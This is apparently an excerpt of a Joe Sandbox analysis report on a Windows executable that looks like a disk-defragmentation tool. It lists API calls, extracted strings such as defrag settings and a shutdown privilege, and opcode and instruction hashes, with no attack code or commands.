                                                                                                                                                                                                                                                                                    • Instruction ID: d51c13efc7a02c32f90284d818f56e509f551fc104d77d5da5b0aeb1152a1774
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eaf92b9f431350d046898c36b2279287ac79430c6c025d09f53a85bfcf413d8d
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 10A189766083449FC300EF59C890A9BB7E9EF88354F10491EF44997360D779ED89CBA5
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(main,DefragTime,0047D9D0,?,00000064,?), ref: 0041134A
                                                                                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(main,TotalDefraggedFileSize,0047EF74,?,00000064,?), ref: 004113FA
                                                                                                                                                                                                                                                                                    • StrFormatByteSizeW.SHLWAPI(00000000), ref: 0041141C
                                                                                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(main,DefraggedFileCount,0047EF74,?,00000064,?), ref: 00411452
                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(?,00000010), ref: 00411474
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 00411483
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: PrivateProfileString$Find$ByteCloseFileFormatNextSize
                                                                                                                                                                                                                                                                                    • String ID: DefragTime$DefraggedFileCount$LG$TotalDefraggedFileSize$`=$main
                                                                                                                                                                                                                                                                                    • API String ID: 2174522762-3670384684
                                                                                                                                                                                                                                                                                    • Opcode ID: 637e9459b825226f02b753a8a6ecd317c3f6f5394dd561357564af9cc347cd40
                                                                                                                                                                                                                                                                                    • Instruction ID: faa287cb98b21d4df2f3e2fa49730f9b90f221f68114e230af78a147129465c0
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 637e9459b825226f02b753a8a6ecd317c3f6f5394dd561357564af9cc347cd40
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 82516271204341AFE324DB21CD45FAF77E8AB88B04F10891EF64D972D1DA74A945CB6A
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(main,DefragTime,0047D9D0,?,00000064,?), ref: 0041134A
                                                                                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(main,TotalDefraggedFileSize,0047EF74,?,00000064,?), ref: 004113FA
                                                                                                                                                                                                                                                                                    • StrFormatByteSizeW.SHLWAPI(00000000), ref: 0041141C
                                                                                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(main,DefraggedFileCount,0047EF74,?,00000064,?), ref: 00411452
                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(?,00000010), ref: 00411474
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 00411483
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: PrivateProfileString$Find$ByteCloseFileFormatNextSize
                                                                                                                                                                                                                                                                                    • String ID: DefragTime$DefraggedFileCount$LG$TotalDefraggedFileSize$`=$main
                                                                                                                                                                                                                                                                                    • API String ID: 2174522762-3670384684
                                                                                                                                                                                                                                                                                    • Opcode ID: 32f377f5775842a14210629ecb5cba280cca974c36c24aed09cdb2c69e2afdbd
                                                                                                                                                                                                                                                                                    • Instruction ID: 01dd7cb33c618876df907d584398aa6540e784f12a7d1eb18dd06df18f62a64b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 32f377f5775842a14210629ecb5cba280cca974c36c24aed09cdb2c69e2afdbd
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB516171204341AFE324DB21CD45FAF77E8AB88B04F10891EF54D972D1DA74A945CB6A
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                                                                                                                                                                                                                                                                    • API String ID: 0-225289630
                                                                                                                                                                                                                                                                                    • Opcode ID: c4eeff96e23f8423c76a4c32bafa8f1c0a88312c509c26e4c8bdaf889564b920
                                                                                                                                                                                                                                                                                    • Instruction ID: a1250dd2abae281965bcbcd99bbab5f3ca081c7f2ebc100e0f91383b9a449a5d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c4eeff96e23f8423c76a4c32bafa8f1c0a88312c509c26e4c8bdaf889564b920
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F9122A2D052A88AF720C625EC04BEBB775EF95301F1881FAD40C67781D67E0EC68F52
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                                                                                                                                                                                                                                                                    • API String ID: 0-225289630
                                                                                                                                                                                                                                                                                    • Opcode ID: a85207eefa916ff92804396951960fcbea30f2298476b24e4c016fc00f141f77
                                                                                                                                                                                                                                                                                    • Instruction ID: 758bb074f1e02f5d219d83cb07dd28aa7128d3b2f90bd517896020da9daeb34d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a85207eefa916ff92804396951960fcbea30f2298476b24e4c016fc00f141f77
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 787135A2D096A88AF7218625EC047EBB775DF91301F0890F9D44CA7781D67E0FC68F26
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: JM<5$L$L$W$a$a$b$d$i$o$r$r$y
                                                                                                                                                                                                                                                                                    • API String ID: 0-2011736602
                                                                                                                                                                                                                                                                                    • Opcode ID: c598ec1c7b20de3c6fa01b0c0dd02dd9d8603e73820023a0ec984d0c6b1ad772
                                                                                                                                                                                                                                                                                    • Instruction ID: 63136df9b4e2b9ab88fafee4aab420784887feb0363108930222d5ca6ea7e0ef
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c598ec1c7b20de3c6fa01b0c0dd02dd9d8603e73820023a0ec984d0c6b1ad772
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A92211B1D046698AFB208B24DC40BEAB7B5FF84310F1481FAD80DA7681D6784FC28F56
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: E$P$P32@$c$e$i$o$r$s$s$t$x
                                                                                                                                                                                                                                                                                    • API String ID: 0-2269684116
                                                                                                                                                                                                                                                                                    • Opcode ID: 93efda853aae18ac3b24485165a57be69ad564f2791e1e021dd8550b08ca92a7
                                                                                                                                                                                                                                                                                    • Instruction ID: 566fded381b5c44124f86d85541a2f214abba5eb8d90c512736025a7e78c9a4c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 93efda853aae18ac3b24485165a57be69ad564f2791e1e021dd8550b08ca92a7
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DAD15BB2D082189AF7248A24DC94BFB7675EF94310F0881FAD44D97780D67E0FC58B66
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: E$P$P32@$c$e$i$o$r$s$s$t$x
                                                                                                                                                                                                                                                                                    • API String ID: 0-2269684116
                                                                                                                                                                                                                                                                                    • Opcode ID: d1022c59ea0b9a5d9822464d441f60f24f82c4066ffcf43c3b8c3142c8d63b51
                                                                                                                                                                                                                                                                                    • Instruction ID: 1b04957f8641a02fe2ad15b2e7decd8342e4988316b47231fcf7e75471d053ba
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d1022c59ea0b9a5d9822464d441f60f24f82c4066ffcf43c3b8c3142c8d63b51
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 05A199A2D182549AF7208A24DC50BFB6679EF94310F0881FED54D976C0E67F0FC58B6A
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: E$P$P32@$c$e$i$o$r$s$s$t$x
                                                                                                                                                                                                                                                                                    • API String ID: 0-2269684116
                                                                                                                                                                                                                                                                                    • Opcode ID: 67708232c783caed01210743f30500afd73b8ffc04a3e19dad3ec982a8eb5999
                                                                                                                                                                                                                                                                                    • Instruction ID: 188e51f99b3aa9ddec7d557129ce05f34de3fbb78c9ae6bc7f213ff74b940b60
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 67708232c783caed01210743f30500afd73b8ffc04a3e19dad3ec982a8eb5999
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D4A178A2D182549AF7208A24DC547FB6679EF94300F0881FED54D976C0E67F0FC58B2A
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,00421955), ref: 00419D9A
                                                                                                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,00421955), ref: 00419DA1
                                                                                                                                                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00419DB7
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00421955), ref: 00419DC6
                                                                                                                                                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32 ref: 00419E04
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00419E13
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00419E24
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseHandle$ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                                                                                    • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                                                                    • API String ID: 1280518032-3733053543
                                                                                                                                                                                                                                                                                    • Opcode ID: da0e7d1861009587fb01dbe4e0b9d2093fea7a0ac8dcd4d1a170a0e53db07ebf
                                                                                                                                                                                                                                                                                    • Instruction ID: d07024e087d9fbb4da489035f39631b0ffcbbc48e9dced30be6a628d6d85d024
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: da0e7d1861009587fb01dbe4e0b9d2093fea7a0ac8dcd4d1a170a0e53db07ebf
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D91130B5208300ABD314DFA4DC89B5B77E4BB88B00F80882CF54DC6290E778D8C48B5A
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: $>
                                                                                                                                                                                                                                                                                    • API String ID: 0-4162622711
                                                                                                                                                                                                                                                                                    • Opcode ID: 92d9eede98623f53117d376c72bc09aac5265e67f7db331a73714669efe9eeb3
                                                                                                                                                                                                                                                                                    • Instruction ID: ab613082dd5abe8ce957bb114a2766d0e8ed38c9df93d9e2be8208bb24206897
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 92d9eede98623f53117d376c72bc09aac5265e67f7db331a73714669efe9eeb3
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5432C1705087419BC339DF24C950BEBB7E5FF99300F04492EE99A872A0E7789945CB5B
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,00421972), ref: 0041E100
                                                                                                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,00421972), ref: 0041E107
                                                                                                                                                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0041E124
                                                                                                                                                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32 ref: 0041E148
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041E14E
                                                                                                                                                                                                                                                                                    • ExitWindowsEx.USER32(00000001,80020003), ref: 0041E16E
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                                                                                                                                                                    • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                                                                    • API String ID: 107509674-3733053543
                                                                                                                                                                                                                                                                                    • Opcode ID: b491cb2bc98087b98b93889b4cab252affd35304ae06bf2e3e34bcfb05d76a30
                                                                                                                                                                                                                                                                                    • Instruction ID: ff8bdaaac48f1339d689247c0ac3bb4d0c15d19762690cb1fcb66aa4c131ddab
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b491cb2bc98087b98b93889b4cab252affd35304ae06bf2e3e34bcfb05d76a30
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7301FC35644310BFE3109BA8DC49B9B7698BB44B04F40482DFD4DE6191D77499408BDA
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?,?,?), ref: 0045A8C2
                                                                                                                                                                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 0045A915
                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,?,?,?), ref: 0045A955
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000,?,00000000,00000000,00000001,?,?,?), ref: 0045A9AA
                                                                                                                                                                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 0045A9CE
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: DiskFreeSpace$Find$CloseFileFirst
                                                                                                                                                                                                                                                                                    • String ID: %c:\
                                                                                                                                                                                                                                                                                    • API String ID: 281833627-3142399695
                                                                                                                                                                                                                                                                                    • Opcode ID: 451e843c757d912e0df44721ece3a0365b6d60f66d903087e08b2b682d24d5dc
                                                                                                                                                                                                                                                                                    • Instruction ID: 5c1349d2b4a299dbbed6192556f5b370b8187b703f81d55d5c722b9a40b8fb44
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 451e843c757d912e0df44721ece3a0365b6d60f66d903087e08b2b682d24d5dc
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A071FBB55057019FD314DF64D988BABB7E4FF98711F008A2EE89A87390E734A848CF56
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • IsIconic.USER32(?), ref: 0041F916
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000027,?,00000000), ref: 0041F937
                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(0000000B), ref: 0041F945
                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(0000000C), ref: 0041F94B
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0041F958
                                                                                                                                                                                                                                                                                    • DrawIcon.USER32(?,?,?,?), ref: 0041F989
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MetricsSystem$ClientDrawIconIconicMessageRectSend
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2166663075-0
                                                                                                                                                                                                                                                                                    • Opcode ID: cb24d554b556fdc8d671f57bd367dd0002cc258e733202bd551999ba64437650
                                                                                                                                                                                                                                                                                    • Instruction ID: c07e6ffc6c3a7e6482c06200d306031f545548e1037b46c62c472d77c4aae73d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cb24d554b556fdc8d671f57bd367dd0002cc258e733202bd551999ba64437650
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE3158712086019FD324DF38C989BABB7E8FB88710F144A2EE19A93290DB74E845CB55
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00020028,?), ref: 00419CFD
                                                                                                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00419D04
                                                                                                                                                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00419D1E
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Process$CurrentLookupOpenPrivilegeTokenValue
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3639550587-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 7148b218a58efe162156a67a36f4013a52d7ca8231e1dbe32e75ae0325f5605e
                                                                                                                                                                                                                                                                                    • Instruction ID: f3d016862a4d3342d6fd7035e13c423cea38e9027ddeccfb2464269e0ea5178e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7148b218a58efe162156a67a36f4013a52d7ca8231e1dbe32e75ae0325f5605e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 73015275644301AFE314CFA5DC89B6BB7E8FB88B05F80492CF54DC2290E774D9848B56
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,00000003,?), ref: 0046326C
                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(?,00000003,?), ref: 00463410
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 0046342D
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                                                                                                    • String ID: %s%s\$%s*
                                                                                                                                                                                                                                                                                    • API String ID: 3541575487-790581550
                                                                                                                                                                                                                                                                                    • Opcode ID: 299fa53831f00350431557c8593a3fc536372945f534859870c8437012aa5de1
                                                                                                                                                                                                                                                                                    • Instruction ID: c3493345b0c0ceefe68b50463acd725d1f8c1e028979316797af0ed8e7acec35
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 299fa53831f00350431557c8593a3fc536372945f534859870c8437012aa5de1
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC71B5711083809FC720EF64C884A6BB7E5FB89314F444A6EF85997391E734EA45CB57
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 00473B49
                                                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00473B5E
                                                                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(0047CF54), ref: 00473B69
                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 00473B85
                                                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 00473B8C
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2579439406-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 5ae23ef8c9597736f524d82b530ad1912cf66df142059fb024dfe3cae4b4f3e6
                                                                                                                                                                                                                                                                                    • Instruction ID: 5fbb9a2fc2dc4524adccc28e56c0de5744acadb4307870d4d3e04b8eaaabc2f4
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5ae23ef8c9597736f524d82b530ad1912cf66df142059fb024dfe3cae4b4f3e6
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E421E3B8828204DFC700DFA5FC856853BA4FB28329F5040BBE80D87762E77466848F5D
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32 ref: 0041C29B
                                                                                                                                                                                                                                                                                    • SHFormatDateTimeW.SHLWAPI(?,00000002,00000000), ref: 0041C2C8
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Time$DateFileFormatSystem
                                                                                                                                                                                                                                                                                    • String ID: DiskDefrag\AutoDefragmention$LastDefragmention
                                                                                                                                                                                                                                                                                    • API String ID: 750415452-3598614746
                                                                                                                                                                                                                                                                                    • Opcode ID: e82a9422a2e71e94cea5bec6a8f095e47c1f013a3b59e1dfa3399cdb80a3d87a
                                                                                                                                                                                                                                                                                    • Instruction ID: a0b1e6286b276bc7d887fd98d5a7f5957222b11053583dbd66c01ec11ac0fb83
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e82a9422a2e71e94cea5bec6a8f095e47c1f013a3b59e1dfa3399cdb80a3d87a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E4115276508701DFD300EF54DD85B9A7BE4FB48720F404A2EF156C22E1EB74A548CB56
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(?,00415169), ref: 004150B0
                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 004150C1
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ImageList_Draw), ref: 004150DB
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                    • String ID: ImageList_Draw
                                                                                                                                                                                                                                                                                    • API String ID: 310444273-2074868843
                                                                                                                                                                                                                                                                                    • Opcode ID: c2548a7b991ba7467d3f124a8d35b83a44c462a32142ecac1e07a96c10e5a41a
                                                                                                                                                                                                                                                                                    • Instruction ID: 64c332f81b35f2aaac3873e7666c404af8577304093a8f0924de00557a4645c6
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c2548a7b991ba7467d3f124a8d35b83a44c462a32142ecac1e07a96c10e5a41a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 62F0D474601B01CFD7608FA9D988A43BBE4BB58715B50C82EE59AC3A00D778F480CF04
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
